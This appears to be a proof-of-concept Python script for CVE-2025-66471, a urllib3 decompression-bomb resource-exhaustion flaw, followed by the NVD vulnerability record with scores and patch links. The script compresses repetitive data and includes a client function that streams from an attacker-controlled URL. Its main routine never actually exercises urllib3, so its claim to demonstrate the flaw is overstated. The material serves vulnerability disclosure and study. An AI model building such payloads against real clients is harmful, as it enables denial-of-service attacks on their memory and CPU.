CVE-2025-66471

""" CVE-2025-66471 Proof of Concept urllib3 Streaming API Resource Exhaustion via Highly Compressed Data Note: This PoC demonstrates the vulnerability concept. Do not use for malicious purposes. """ import gzip import zlib import urllib3 from io import BytesIO def generate_highly_compressed_data(): """ Generate highly compressed data that will cause excessive memory allocation when decompressed by urllib3's streaming API. """ # Create data that compresses extremely well (high compression ratio) original_data = b'A' * 1000000 # 1MB of repeated characters # Use maximum compression level compressed_gzip = gzip.compress(original_data, compresslevel=9) print(f"Original size: {len(original_data)} bytes") print(f"Compressed size: {len(compressed_gzip)} bytes") print(f"Compression ratio: {len(original_data) / len(compressed_gzip):.1f}:1") return compressed_gzip def exploit_urllib3_streaming(url): """ Attempt to trigger resource exhaustion through urllib3 streaming API. This simulates what an attacker could do by controlling the server response. """ # Create a pool manager (this is what the client would use) http = urllib3.PoolManager() try: # Request with streaming enabled response = http.request('GET', url, preload_content=False, timeout=30.0) # Try to read in small chunks # The vulnerability is triggered when urllib3 decompresses the entire # highly compressed response in a single operation chunk_size = 1024 total_read = 0 chunks = [] for i in range(100): # Limit iterations for safety chunk = response.read(chunk_size) if not chunk: break chunks.append(chunk) total_read += len(chunk) print(f"Read chunk {i+1}: {len(chunk)} bytes, total: {total_read}") response.release_conn() return total_read except Exception as e: print(f"Error during streaming: {e}") return None def create_malicious_server_simulation(): """ Simulate a malicious server response with highly compressed data. In a real attack scenario, the attacker would control the server. """ compressed_data = generate_highly_compressed_data() # Create a BytesIO object to simulate the compressed response bio = BytesIO(compressed_data) # Manually decompress to show the expected behavior vs actual behavior import gzip decompressed = gzip.decompress(compressed_data) print(f"When fully decompressed: {len(decompressed)} bytes") print(f"This demonstrates the resource allocation issue in urllib3") return compressed_data if __name__ == '__main__': print("=" * 60) print("CVE-2025-66471 - urllib3 Resource Exhaustion PoC") print("=" * 60) # Generate the malicious compressed data create_malicious_server_simulation() print("\nNote: To trigger this vulnerability, an attacker would need to:") print("1. Control a server that responds with highly compressed data") print("2. Have a victim application use urllib3's streaming API") print("3. The victim's application would experience high CPU/memory usage")

{"cve": {"id": "CVE-2025-66471", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:04.400", "lastModified": "2025-12-10T16:10:33.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "urllib3 is a user-friendly HTTP client library for Python. Starting in version 1.0 and prior to 2.6.0, the Streaming API improperly handles highly compressed data. urllib3's streaming API is designed for the efficient handling of large HTTP responses by reading the content in chunks, rather than loading the entire response body into memory at once. When streaming a compressed response, urllib3 can perform decoding or decompression based on the HTTP Content-Encoding header (e.g., gzip, deflate, br, or zstd). The library must read compressed data from the network and decompress it until the requested chunk size is met. Any resulting decompressed data that exceeds the requested amount is held in an internal buffer for the next read operation. The decompression logic could cause urllib3 to fully decode a small amount of highly compressed data in a single operation. This can result in excessive resource consumption (high CPU usage and massive memory allocation for the decompressed data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-409"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:python:urllib3:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0", "versionEndExcluding": "2.6.0", "matchCriteriaId": "2196EB74-E1B9-4BD0-96B6-9477225D385D"}]}]}], "references": [{"url": "https://github.com/urllib3/urllib3/commit/c19571de34c47de3a766541b041637ba5f716ed7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}